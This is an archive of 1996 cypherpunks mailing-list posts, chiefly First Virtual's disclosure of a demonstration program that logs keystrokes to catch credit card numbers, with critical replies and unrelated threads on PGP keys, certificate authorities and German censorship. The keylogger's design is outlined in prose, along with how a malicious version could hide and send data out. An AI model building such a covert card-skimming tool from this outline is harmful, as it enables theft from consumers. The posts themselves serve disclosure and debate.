> From: Nathaniel Borenstein <nsb@nsb.fv.com>
> To: zinc <zinc@zifi.genetics.utah.edu>
> Cc: cypherpunks@toad.com
> Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
> 
> Excerpts from mail: 29-Jan-96 Re: FV Demonstrates Fatal F..
> zinc@zifi.genetics.utah. (1368*)
> 
> > so what?  fv has a keyboard sniffer...
> 
> It's considerably more than that.  Please read on.
> 
> > for what it's worth, this sort of program could easily be used to get 
> > info more important than credit card numbers.  passphrases and 
> > passwords of all kinds could be obtained leading to broken accts or 
> > worthless cryptography.
> 
> Yes, but I think you've missed the main point, probably because we
> haven't made it clear enough.  What's unique about credit card numbers
> is that they're very small amounts of data, self-identifying, and of
> direct financial value as a one-way financial instrument (i.e. with no
> confirmation process).  
> 
> The attack we've outlined -- and partially demonstrated -- is based on
> the combination of several known flaws:
> 
> 	-- It's easy to put malicious software on consumer machines
> 	-- It's easy to monitor keystrokes
> 	-- It's trivial to detect credit card numbers in larger data streams
> 	-- It's easy to disseminate small amounts of information tracelessly


this program is not specific to credit card numbers.  it sounds like
it could have just as easily been written to watch for a login: or
password: prompt and then record everything entered after that.

the point is not that this can be done, the point is that users need
tools that would check for programs like this running on their
system.  is fv making a 'fix' available?  i would imagine a  'fix'
would be a program that would look for tsr type programs (or inits on
a mac) that do this sort of thing.  

this is the sort of thing that crypto can help with.  there should be
a site that PGP signs the programs available from their site.  these
signed programs will have been testing on the appropriate system and
verified to be free of small malicious programs such as the one you
describe.  alternatively, the author themselves could PGP sign the app
(this is already done) and this would be what users should d/l.

it's disapointing to see the spin put on this by fv.  instead of
going with scare tactics, they could encourage PGP signatures and suggest
solutions to this problem like the ones i mentioned above.  in fact,
fv could even volunteer to help set up a site where all software has
been tested and signed by someone who has had their PGP key signed by
fv, sort of an expansion of the web of trust.

more of my $0.02..

- -pjf


"Those that give up essential liberty to obtain a little temporary
 safety deserve neither liberty nor safety." -- Benjamin Franklin (1773)

zifi runs LINUX 1.3.59 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp1.6, a Pine/PGP interface.

iQCVAwUBMQ08Fk3Qo/lG0AH5AQGh6QP9EG5BLKZcV7vSxtfyJn0HLIWaXOHU4X9Q
5URRgN6XdDYWO/hZq5jEGEgZv9lm1xO5b0jjXb5MSlIQd0fR4hi3n2W9dTMza7/n
ax42OTIyXAGZx/H/s0arSWwnST6AYaU60oEvnQ3/V86aJFgzvQaFZRiC256edVph
jeQ1Gt/UwNU=
=WYec
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Wed, 31 Jan 1996 04:01:57 +0800
To: nsb@nsb.fv.com (Nathaniel Borenstein)
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <Al3GYGSMc50eQWYAdR@nsb.fv.com>
Message-ID: <199601292130.OAA18538@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Nathaniel Borenstein writes:

> [My apologies in advance if you see several copies of this message.  I
> am posting this fairly widely due to the severity and importance of the
> problem described.]

Followed by an hysterical essay on how FV has "discovered" the keyboard
sniffer. Oh, please. You people should be ashamed of yourselves.


                                -- Will





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Tue, 30 Jan 1996 17:16:55 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: RE: FV Demonstrates Fatal Flaw in Software Encryption of Credi   tCards
Message-ID: <310D4CCE@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



This announcement describes a rather sophisticated technology that   
delivers nthe same information that any retail clerk can capture today.   
 Using stolen credit card numbers is a risky business, and the ability of   
the credit card companies in detecting fraud and locating criminals is   
quite real.

Of course, since Federal law requires the credit card companies, not the   
user, to pay the costs of fraud, First Virtual's entire premise is a red   
herring.  If the credit card companies are willing to take the risk, they   
will (and are).

Scare tactics are nothing new in the PR business, but I would recommend   
that the principals at FV learn about "cutouts" for this type of   
gimmickry if they wish to preserve their reputations....

dvw  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Just Rich <rich@c2.org>
Date: Tue, 30 Jan 1996 11:48:44 +0800
To: cypherpunks@toad.com
Subject: [NOISY] Deutsche Telekom <--> webcom.com "routing troubles"
Message-ID: <199601292241.OAA11703@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

 [Capsule summary: the largest German Internet provider has blocked access
 to webcom.com at the router lever because of one out of a thousand
 subscribers' files, which violate German anti-Nazi laws.]

Someone please inform Deutsche Telekom and the relevant prosecutors that
by the time they read this (i.e., within an hour), selected files from
Zundel's holocaust-denial archives (which make me sick, but that's beside
the point) will be available at the AFS path: 

 /afs/ir.stanford.edu/users/l/llurch/WWW/Not_By_Me_Not_My_Views/

One of the ways this directory can be reached is through:

 http://www-leland.stanford.edu/~llurch/Not_By_Me_Not_My_Views/

Indeed, a simple symlink would be sufficient to make these files available
on any other server at any other organization that mounts AFS, which
include uni-freiburg.de, mathematik-cip.uni-stuttgart.de, ifh.de, desy.de,
zdvpool.uni-tuebingen.de, zdvpool.uni-tuebingen.de, ipp-garching.mpg.de,
afs-math.zib-berlin.de, lrz-muenchen.de, and a dozen other sites in
Germany. 

To be safe, Deutsche Telekom would have to firewall the entire world.

For information on the global distributed AFS file system, which is used
by most major US universities, see http://www.transarc.com/

For my views on the Holocaust, see http://nizkor.almanac.bc.ca/, which 
unfortunately seems to be unreachable from the US at the moment because 
of a routing loop at Seattle.mci.net.

These files will be removed from my directories and replaced by a pointer
to the original URLs if/when it appears that no organization, public or
private, is actively suppressing them. I'm not interested in providing
free Web space. 

It took only four email messages and a half hour of my time to set this 
up. You're kidding yourself if you believe that censorship is even 
halfway effective, much less wise, in the digital age.

The proper response to people like Zundel is documentation and refutation,
such as is practiced by the Nizkor (Remember) project, www.almanac.bc.ca.
I plan to play an active role in distributing Zundel's files only as long
as necessary to prove the censorship point, because I don't want to give
him free space. But I will personally archive his files because I believe
that lies like these should be saved as such, not smothered. 

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQ1NqY3DXUbM57SdAQH5WgP/byEnhFNgbzwVCDTq+HVFvcHdkum+vuBM
XAD6+EvPehrrQLtA1cKyVAd6A/Mzt274eq1ihYaBhyiml1e+QSx3VFrPe4EKKTm1
bs0UWHXlSjwbeW5DdFPIGrglrVIuof5MV1ZH5uvEV4yFsgQoz15TBrJa5r+47H8q
iH54Kiq5/p4=
=LD6X
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 30 Jan 1996 09:12:43 +0800
To: Ted Garrett <cypherpunks@toad.com
Subject: Re: Here's how you put your key on the keyservers...
Message-ID: <m0th2TS-00092OC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 07:39 AM 1/29/96 -0500, Ted Garrett wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>I got a message in response to a request I made to someone for their public
>key.  I wanted to check the signatures that they included with their posts
>to cypherpunks, but their key was not on the keyservers.  The key they
>included was completely unsigned, and when I use it to validate their
>previous posts as well as the message they sent which included the key, the
>signatures come back as bad, the contents of the file changed.  Names are
>appropriately withheld (I hope). 

At this point, I think it would be appropriate to declare that I am the 
person Ted was communicating with, and the one he is referring to and 
(correctly, as I recall my own posts) quoting.  I am, yes, a real newbie, 
and I appreciate the indirect lesson in "nettiquette" he is showing by not 
identifying my private email to him.  I'm identifying myself for a number of 
reasons:

1.  I REALLY am a newbie (at least to most of Internet, and common usage of 
PGP, etc.), and haven't learned much of the ways of Internet.  (with a 
strange, short, early exception, which I will relate in another message if 
anybody has any interest in Internet history.)

2.  I want to solve the problems Ted presumably correctly identified in my 
signing.  (I use freebie Eudora, and WPGP, etc.)  I only started signing my 
posts when I got a copy of WPGP by Gostl, and it made things much easier.


3.  I did not want to make it difficult for him to fight off a potential 
MITM attack while, at the same time, complying with "nettiquette", 
especially seeing as how my key is not (yet) in any keyserver, which is 
obviously MY fault, not his!  I want him to be able to point (and, repost, 
with my full permission) any messages allegedly from me that he receives by 
private email, so that others might check the signature too with their own 
software.

This  permission to him applies to any prior messages I've sent him, too, 
ideally so that anyone else can check the signature status against my sig.
Ted may 
be right; there may be a MITM attack.  More likely, it's a case of galloping 
NEWBIE-ITIS on my own part, sorry.


Earlier, when I just began using WPGP to sign Eudora stuff, I was told that 
my signature didn't match.  On the other hand, I was told by others that 
this is a common flaw of signing messages, having to do with line lengths.  
When I first started sending messages, I didn't use the "Wrap" selection of 
Eudora (under the EDIT selection), meaning that my lines were as long as the 
paragraphs were typed.
  
Most people didn't seem to notice, I guess, because it took somebody a few 
weeks to eventually complain.  After that, I RTFM'd and adopted the practice 
of WRAPping my paragraphs to limit their length to "reasonable" values.  
(although I would appreciate somebody explaining to me why this DAMN EUDORA 
can't seem to correctly re-wrap a paragraph after modification.  Hell, 
Wordstar Version 3.0 for CP/M (shows you how long _I've_ been into 
computers!) reformatted paragraphs just fine back in 1982 on a 12.5 MHz Z-80 
(ask me how I did this and I'll tell you a LONG story!)


3.  Ted began to suspect a "MITM attack."  While I'm a newbie, I'm well 
aware this is "man in the middle" and am aware of the potential (dangerous!)
implications.  Needless to say, I can't even say for certain that such an 
attack isn't happening.  Yes, I am on no keyservers, yet, but I will try my 
best to follow his kind instructions and accomplish this feat.  And yes, I 
am reminded that I need to sign my OWN public key, which (being a f______ 
newbie), I haven't even done yet!  (This message will contain, however, BOTH 
my 1024-bit and 2047 bit public keys, unsigned, and I will sign the whole 
message with my 1024-bit key.  I'd sign it with BOTH, but I don't know if 
WPGP will even do this.  I'd sign a second copy with the 2047-bit key, 
except that would be wasting bandwidth.


> As I understand the bcc: definition, only
>I and the first smtp server this message hits should know who it's to.  I
>don't know if anyone else reading this mailing list needs this info, but
>just in case... here's my reply to the message.
>
>At 10:03 PM 1/28/96 -0800, you wrote:
>>Sorry, I'm a newbie to Internet, and also the Internet usage of PGP.  I just
>>participated in a local keysigning meeting, so maybe my key will find its
>>way to a server.

I wrote that.

>Don't worry about being a 'newbie'.  Everyone starts somewhere.  However,
>your key will usually not 'find its way' to a server without you
>specifically sending it.

Thanks; I sorta assumed that, but until recently my usage of PGP was between 
me and my friends who knew me by face and voice, and who have my keys from 
hand-carried floppy disks that I gave them myself.

> The keyserver I usually use is accessed by sending
>a mail message which fits the following format.  As far as I know, all the
>keyservers use this format to add or update keys in their databases.  You
>only have to send it to one keyserver, and it will propagate to all the
>others.  I have indented the text so that no handlers decide to interpret it
>as a new message.

Okay, thanks for the details.  


>
>- - To: pgp-public-keys@pgp.iastate.edu
>- - Subject: ADD
>- -
>- - -----BEGIN PGP PUBLIC KEY BLOCK-----
>- - Version: 2.6.2
>- -
>- - [key deleted to protect the innocent]
>- -
>- - -----END PGP PUBLIC KEY BLOCK-----
>
>>I'm sorry to have to admit that I don't even know how to do this!  Newbie
>>alert!

Again, I wrote that.

>If you don't admit you don't know something, nobody will usually tell you
>how to do it.  Also, you should sign your own key.  That will make it harder
>to forge, I think.

Okay, up  until now I've generally given out my key in messages, and signed 
the entire message with the key.

> The reasons were spelled out in a couple of the web
>pages I read, but I've forgotten them.  It has something to do with either a
>denial of service attack or a man in the middle attack, or both.  The
>command to do this is:

Someday I'm gonna understand this stuff!

>
>pgp -ks 0xHEXKEYID
>
>Honestly, I've only just begun to use pgp myself.  Also, you should add your
>e-mail address to the user-id of your key.  The command to do so is: 
>
>pgp -ke 0xHEXKEYID
>

Again, much appreciated.  I hate to RTFM.  Lazy bum, I.


>You will be asked if you wish to add a user id to the key.  Say yes, and
>give it your e-mail address.  What this does is it allows people who are
>using pgp-enabled mailers to directly encrypt messages to you without
>choosing your key manually.
>
>The reason that I have not encrypted this message to you using the key you
>provided is that when I extracted the key and re-checked your message, the
>signature was no good.  I've found that (using eudora) I must turn off the
>word wrap feature of my mailer to allow for good signed messages out.  Of
>course, having said this, I'll probably not get a good signature on this
>message.  Let me know if it signs ok.

I didn't check the signature of his message, admittedly.  Guess I need to 
give him some feedback, huh?



>Now, I have a question.  Which attack(s) is/are a person vulnerable to when
>distributing an unsigned public key in the open?  Could this actually be a
>complex man-in-the-middle attack?  Am I paranoid?

Unfortunately, the more I learn about encryption, the more "paranoid" I get! 
 Of course, I have a few more reasons than most, but...

[I deleted Ted Garrett's signature.  My own will follow my own two public 
keys.]

My 1024-bit key.

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAi1zvWcAAAEEAKmSqngLWK2N2gOJKPtjF9VCfSkXY+XUZBRCbbFU71uH/dLX
C2Uq6wFS8alRgMc3rp90JnnJ/6eJqXwMjCunogwucWOaU7S/w+OwjOG9fUqsXIA6
2j25Wtjce65mbp0TKLAzwMb/P/Qq7BlclqhuKzfVBH7dIHnVAvqHVDBboB2dAAUR
tBFKYW1lcyBEYWx0b24gQmVsbA==
=G3LA
- -----END PGP PUBLIC KEY BLOCK-----


My 2047-bit key.

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQENAzDCFH4AAAEH/15sMvnnK1BIvLkxQsKwUHP7dKNFbKrQOtOoyLOFTk4/0Zlr
gXkKw6NciDYaOKwW9dsIL3N3rjAlWtioQ/gg+5vMNoJOQXpp95mKBzpWYLeaB8MF
Km6H/NGWISx5cz06NOGutWcaezO/S4xm8ay7W8HaZ4EmHQdXtSKIAL41PBQyyuhR
wIKX+QwsAgKS1LALr9MuW7nXL6/h139QeNRAR+ubXyftoklFHC+HF+jcTTDuNjmU
4p7BEMp9cmYHh6WEYTZyOz5F8/8gtEbPA0IKsQH1LGdf+2APLqMdciuU8ALZA+ZM
bbaBaxshqHbYfCQ8+ATCrBjsU0nO8RKjhSx91vkABRG0DUphbWVzIEQuIEJlbGw=
=uncA
- -----END PGP PUBLIC KEY BLOCK-----


James Dalton Bell.

Klaatu Burada Nikto

Something is going to happen....    Something...  Wonderful!
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQ1PZ/qHVDBboB2dAQE+AAP+MP5hM2j1Z3z+7cdZ/U12qH/uu6Dq2NEP
LgKJ8Nm0idN7oiBZpYD2zuT22mhsIhCJzzmC3XIBiyX1AP4voDqrIwgLmvPgogcp
Cr9p75xi2/UqV1mrYIWeHG4KJc+/x5V4PxeYg5iz0jjnLKN1mzmnjPRDqAOaaBhK
08MMgOkqxFs=
=jU9M
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Williams <peter@verisign.com>
Date: Tue, 30 Jan 1996 11:39:50 +0800
To: Alex Strasheim <cp@proust.suba.com>
Subject: Re: [Fwd: Netscape, CAs, and Verisign]
Message-ID: <199601292200.OAA22310@dustin.verisign.com>
MIME-Version: 1.0
Content-Type: text/plain



>I'd like to see a less centralized CA that's tied into the existing system
>of notaries.  The idea is to make it necessary to spoof a notary in order
>to spoof the CA.  That won't make spoofing the CA impossible (nothing
>will), but it will make spoofing the CA illegal. 

You might wish to look at the Apple DigiSign design. RSA DSI ran a CA
under contract as a notary enrollment system for 2 years. The people from
RSA DSI,
now at Verisign, have a certain amount of experience with this system.

I dont understand how you intend to make CA spoofing illegal. Who
who perform the enforcement? (By illegal, I assume you mean that
there is a criminal offence involved, rather than a tort.)

>
>A notary could apply to the CA for the right to work as an agent, for a
>nominal fee (<$100/year).  Only notaries could be agents.  If a person
>wants a certificate, they'd come in and present ID and a key to the
>notary/agent.  The person would have to present a form document stating
>that he's requesting the cert.  The notary would stamp the form and affix
>a signature to the key which would enable it to be processed automatically
>by the CA. 

This has been tried, and many certificates issued under a variant
of this scheme. it seems likely that only an ABA-certified notary
would be reasonaby secure from professional liabilities. Good
efforts have been made to qualify what the professional procedures would
be. 


>
>Fees for the whole procedure ought to be less than $30.  The CA ought to
>operate off of the fees from the agents as a non-profit organization, and
>the agents ought to keep the fees paid by the people requesting the
>certificates.

Notary fees might be best controlled by the notary, not the CA. Seems
an unreasonable restriction of trade to price-fix, even at the low-end.


>
>Would any of the lawyers on the list be willing to comment on whether or
>not it's possible or practical to tie a CA into the notary system?  Does
>anyone have any thoughts as to how difficult/risky spoofing my CA is
>compared to spoofing Netscape or Verisign? 

There is indeed a large body of legal ramifications in this
area. The best way to learn about it is to become a CA and do it. Risk
taking is part of being in the CA business, however you operate it,
even for free.

>
>I could put up a server and I think I know a laywer who would help me set
>up a non-profit organiation on a shoestring, but I don't want to do it if
>the plan is impractical.  

Running as a not-for-profit may not prevent general liability. You can
give the service away for free and will still be liable for the
mis-representations you or your agents make. There are DARPA reports written
about
the issue (though these do not usually constitute advice.)

>
>Morevover, although I don't think it's reasonable to expect Netscape to
>agree to include a non-existent CA in their browsers sight unseen, at the
>same time it doesn't seem smart to sink money into setting up the CA
>without some indication from Netscape that they're willing to give the
>idea good faith consideration. 

Navigator betas seem to already facilitate users configuring their own
trust points in a manner rather similar to adding a key to your
personal PGP keyring.

IBM browsers allow formal configuration of trust points.

CAs as a business and economic growth area are just happening. We have
two declared companies; Verisign and GTE. I personally expect another
10-20 to declare soon. The large (phone company) networks seem to
be where the current action is, followed by the large accounting firms. As
a small software company, I personally back the other similarly
small software companies making and selling organizational CA
systems to help people manage their own community of interest as
they see fit.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Tue, 30 Jan 1996 05:35:33 +0800
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: Downsizing the NSA
In-Reply-To: <199601290722.CAA21466@opine.cs.umass.edu>
Message-ID: <Pine.SV4.3.91.960129150114.6284A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain



> > congratulate the victors, and downsize by 20,000 employees?
> 
> Alan Horowitz writes:
> # You didn't read about it in the _Baltimore Sun_, so obviously it must not 
> # have happened?
> 
> Where do you propose that these 20,000 mathematicians went?  Did they take

  There are lots of non-mathematcicticians working at NSA. I didn't say 
that NSA down-sized by 20,000. I'm saying that not everything that NSA 
does, becomes common knowledge in a few weeks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Wed, 31 Jan 1996 11:49:20 +0800
To: cypherpunks@toad.com
Subject: Re: Escrowing Viewing and Reading Habits with the Governmen
In-Reply-To: <9601291905.AA20307@toad.com>
Message-ID: <199601292004.PAA04006@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


 > Do you really think the FBI believes that asking librarians to keep 
 > records of customer useage is an efficient way to read the customers minds?
 > Do you really think that the FBI foreign counter-intelligence squad has 
 > nothing better to do than keep a database of who is reading Che Guevara 
 > memoirs?
> 
> Yes.
> 
> Heck, I remember this was a big issue about 15 years ago. Try asking
> someone who was active in library science in the late 70's, early 80's.
> 
> The general reaction of the library community was, I am glad to say, 
> entirely pro-privacy.

Ask Sean at dra.com. The s/w industry even designs library systems
so as to purge data the Feebs might want. That that does not exist can
not be surrendered.

And this is not a cost-free choice to them. There is & will be a
percentage of book vandals. If your circulation system could tell you:
	Who checked out X, Y, Z & T?
You might catch the creeps. But they prefer buying new books to the
alternative....





-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Tue, 30 Jan 1996 07:58:42 +0800
To: Thomas Roessler <Thomas.Roessler@sobolev.rhein.de>
Subject: [FACTS] Germany, or "Oh no not again"
In-Reply-To: <199601291710.SAA13359@sobolev.rhein.de>
Message-ID: <9601292106.AA15042@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Thomas Roessler writes:
 >                      ... In particular, they are right now
 > *checking* whether providing internet access is a criminal
 > offence due to the possibility to gain access to `inciting
 > material' (the German word is `Volksverhetzung') via the Net.

If so, then this humble non-lawyer would suggest to the prosecutors
that they go after travel agencies next, because they sell airline
tickets that could be used to travel to countries where offensive
material is available.

______c_____________________________________________________________________
Mike M Nally * Tivoli Systems * Austin TX   * I want more, I want more,
       m5@tivoli.com * m101@io.com          * I want more, I want more ...
      <URL:http://www.io.com/~m101>         *_______________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Tue, 30 Jan 1996 05:06:20 +0800
To: cypherpunks@toad.com
Subject: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
Message-ID: <Al3GYGSMc50eQWYAdR@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


[My apologies in advance if you see several copies of this message.  I
am posting this fairly widely due to the severity and importance of the
problem described.]

As you may already have heard via the popular press, First Virtual
Holdings has developed and demonstrated a program which completely
undermines the security of every known credit-card encryption mechanism
for Internet commerce.  This is a very serious matter, and we want to
make sure that the Internet community is properly informed about the
nature of the problem that we have uncovered, and the manner in which we
have made the information known.  In this (unavoidably lengthy) post, I
will try to explain the nature of the problem and its implications for
Internet commerce.  In deference to those who are not technically
oriented, the detailed explanation of how the attack works will be the
LAST part of this message.

First of all, let me be perfectly clear about the nature of the problem
we have exposed.  It is NOT a bug in a single program, and it is
therefore NOT something that can be fixed with a "patch" or any other
kind of software upgrade.  Instead, we have demonstrated a very general
attack that undermines ALL programs that ask users to type a credit card
number into their home computer.  We have tested the program and
confirmed that it undermines the security of the credit card encryption
software from Netscape and Cybercash, and we expect that it will work
similarly for ANY future software based on the encryption of credit card
numbers on the desktop.  Quite simply, we believe that this program
demonstrates a FATAL flaw in one whole approach to Internet commerce,
and that the use of software to encrypt credit card numbers can NEVER be
made safe.  For consumers, we recommend the following simple rule:

NEVER TYPE YOUR CREDIT CARD NUMBER INTO A COMPUTER.

We should also be clear about the Internet commerce mechanisms that are
NOT affected by this problem.  First Virtual is unaffected because we
never ask the user to put a credit card number at risk by typing it into
a computer.  Hardware-based solutions can also be devised that are
immune to this attack, including solutions based on smart cards and
solutions based on "card swipe" machines in the home.  We believe that
current digital cash solutions are also not vulnerable to this attack,
although some variants of digital cash may be vulnerable to a similar
form of attack.  Commerce mechanisms based on the use of telephones or
fax machines to transmit credit card numbers are also unaffected by this
kind of attack.  Other proposed commerce mechanisms should, from now on,
be evaluated with this kind of attack in mind.  The bottom line: 
INTERNET COMMERCE CAN BE VERY SAFE, WITH SEVERAL DIFFERENT MECHANISMS,
BUT ENCRYPTING CREDIT CARDS ON THE DESKTOP IS NOT ONE OF THE SAFE
MECHANISMS.

It's important to understand why we have taken this step.  Obviously, as
the long-time leaders in Internet commerce, the last thing we would want
to do is to undermine general confidence in Internet commerce.  However,
we realized that many people believed that credit card encryption was a
safe and easy path to Internet commerce, and that very few people
understood how easily it could be undermined.  Upon investigation, we
were frankly startled to realize just how easy it was -- a single
programmer got the first version of our program running in about a week.
 Aside from our obvious interest in promoting our own commerce
mechanism, we felt that we had an ethical obligation to bring this
problem to the attention of the consumers, banks, and other financial
institutions who could conceivably suffer catastrophic losses if
software encryption of credit card numbers became widespread.

We also realize that we have an obligation to do everything possible to
avoid helping any unscrupulous people who might seek to utilize this
flaw for malicious purposes.  We have accordingly been extremely
responsible in how we have handled our discovery.  We first demonstrated
and explained our program to vital organizations such as CERT (the
Computer Emergency Response Team) and the ABA (American Banking
Association).  Only after many such private disclosures, none of which
revealed any defense against our technique, did we publicly disclose the
existence of this program.

In addition, we have taken several steps to "cripple" our demonstration
program, all of which will be discussed below.    Furthermore, we have
NOT made the program itself generally available.  We are currently
demonstrating it to selected financial institutions and government
agencies, and will provide copies of the program only to CERT and a few
other independent security-minded organizations.  We have also alerted
Netscape to the problem as part of their "bugs bounty" program.  At some
future date, we might conceivably distribute the program, in binary form
on CD ROM, to selected financial institutions.  The source code will
always be very closely guarded.  Unfortunately, however, the general
method of attack is extremely easy to duplicate, and we don't know of
any good way to alert the public to the problem without explaining it.

THE TECHNIQUE

Our basic approach was to write a computer program that runs undetected
while it monitors your  computer system. A sophisticated version of such
a program can intercept and analyze every  keystroke, mouse-click, and
even messages sent to your screen, but all we needed was the keystrokes.
Selectively intercepted information can be immediately and secretly
transmitted via  Internet protocols, or stored for later use.  

First Virtual's research team has built and demonstrated a particular
implementation of such a program, which only watches for credit card
numbers.  Whenever you type a credit card number into your computer --
even if you are talking to "secure" encryption software -- it captures
your card number.  Our program doesn't do anything harmful with your
credit card number, but merely announces that it has captured it.  A
malicious program of this type could quietly transmit your credit card
number to criminals without your knowledge.

The underlying problem is that the desktop -- the consumer's computer --
is not secure.  There is no way of ensuring that all software installed
on the consumer's machine can be trusted.  Given this fact, it is unwise
to trust ANY software such as a "secure" browser, because malicious
software could have easily been interposed between the user and the
trusted software.  

The bottom line for consumers is that, on personal computers,
INFORMATION IS INSECURE THE MOMENT YOU TOUCH A KEY.  We  have
dramatically proven that security  ends the moment you type sensitive
information into your computer. The vulnerability lies in the fact that
information must travel from your  keyboard, into your computer's
operating system, and then to your "secure" application. It can be
easily intercepted along the way.

This kind of insecurity is very frightening, and has implications far
beyond credit card theft.  However, credit cards embody and demonstrate
the kind of information that is MOST vulnerable to this kind of attack. 
Credit card numbers are far more vulnerable to this kind of attack than
most other forms of information because of the following particular
characteristics of credit card numbers:

-- Credit card numbers are easily recognized by simple pattern recognition.
-- Credit card numbers are "one way" financial instruments, with no
user-level confirmation or verification required for their use.
-- Credit card numbers are of direct financial value.

In short, credit card numbers are an almost perfect example of how NOT
to design a payment instrument for an insecure public computer network
such as the Internet.

DETAILS:  HOW TO TOTALLY UNDERMINE SOFTWARE ENCRYPTION OF CREDIT CARDS

First Virtual's demonstration credit-card interception program, once
installed, observes every keystroke that you type, watching for credit
card numbers.  It recognizes credit card numbers with almost perfect
accuracy, because credit card numbers are specifically designed to match
a simple, self-identifying pattern, including a check digit.  Our
program is even smart about punctuation and simple editing functions, so
that nearly any credit card number that you type into your computer is
immediately recognized as such by this program.  

When our program spots a credit card number, it immediately plays a
warning sound and pops up a window on your screen, including an iconic
representation of the type of credit card that you have just entered,
along with a clear explanation of what has just happened.  The current
program works only on Microsoft Windows (Windows 3.1, Windows NT, and
Windows 95), but we believe that it would be simple to implement on
Macintosh and UNIX systems as well.  The program doesn't exploit any
"holes" or bugs in the operating system.  It uses existing, necessary
operating system facilities which are part of the published Windows API,
and which are necessary for the implementation of screen savers,
keyboard macros, and other important software packages.

First Virtual's intent is to educate the public, certainly not to
endanger it.  For that reason, our program incorporates four important
precautions intended to prevent any possibility of harm:

1)  Our program is not self-replicating.  While a malicious program
exploiting the same security flaw could easily be embedded in a virus,
spreading itself all over the world, that was not our goal.  Instead,
the program must be deliberately and manually installed on each computer
on which it is to run.  

2)  Our program always puts up an icon on your screen when it is
watching your keystrokes.  This is certainly not necessary, and it is
clear that a malicious program would be unlikely to do this.

3)  Our program is easy to remove from your computer, and even offers an
"Uninstall" button to the user.  Obviously a malicious program would
hide itself as well as possible, and make itself as hard to remove as
possible.

4)  Our program never transmits your credit card over the Internet. 
While a program using this approach could transmit your information to a
criminal in a totally untraceable manner, we would never do anything
like that.  In fact, we erase your credit card number from our program's
memory before we even tell you that we've seen it, thus making sure that
the credit card number can't even be retrieved by an inspection of our
program's memory.

It is frankly difficult to overstate the severity of the problem
demonstrated by our program.  A clever criminal could use viral
techniques to spread a malicious program based on the same approach, and
would be no more likely to be caught in the act than the authors of any
of the computer viruses that plague the world today.  Once it detects a
credit card number, a criminal program could use any of several
techniques to send that number to the original criminal without
providing any way to trace the criminal's receipt of it.  (If you're
skeptical about this claim, we'd prefer to talk with you privately, as
we've never seen the "best" methods for doing this spelled out in
public, and we would prefer to keep it that way.)  Altogether, this
means that if millions of credit card numbers were being typed into
Internet-connected personal computers, a criminal could obtain a
virtually unlimited supply of card numbers for his own use.  In fact,
for all we know this could already be happening today.  The first
visible sign of such an attack, if it were well-executed, would be a
gradual rise in the overall rate of credit card fraud.

POSSIBLE SOLUTIONS

First Virtual believes that the flaw we have uncovered is fatal.  In the
foreseeable future, all commerce schemes based on software encryption of
credit cards on the desktop are completely vulnerable to this sort of
attack.

The basic problem is that software encryption of credit cards is
predicated on the notion of "trusted software".  On the consumer
computing platforms, however, general purpose operating system
functionality makes it unwise to assume too strong a level of trust in
such software.  No operating system with anything less than
military-grade security (B2) is likely to be safe from an attack such as
this one.

This does not mean that Internet commerce is dead.  Any scheme that is
not based on self-identifying one-way financial instruments such as
credit cards will be essentially unaffected by this problem.  Moreover,
even credit cards may be made safe on the Internet using one of two
approaches:  secure hardware add-ons and the First Virtual approach.

First Virtual's Internet Payment Systems never places the consumer's
credit card number on the Internet.  Instead, the consumer provides it
to us by telephone when the account is opened.  After that, all
purchases are made using a "Virtual PIN".  Virtual PINs are essentially
Internet aliases for underlying payment mechanisms such as credit card
numbers, but with several kinds of added security.  Virtual PINs are
free-form text, with no recognizable pattern, which makes them much
harder to detect with the kind of attack we have just demonstrated. 
Moreover, Virtual PINs are only usable in conjunction with First
Virtual's unique email verification process.  No payment is made until
the consumer confirms an email query, which means that defrauding First
Virtual is a multi-step process that is extremely difficult to automate.
 (For more details, we recommend our paper, "Perils and Pitfalls of
Practical CyberCommerce", available via ftp from
ftp://ftp.fv.com/pub/nsb/fv-austin.txt.)

The bottom line, once again, for those of you who have read this far:

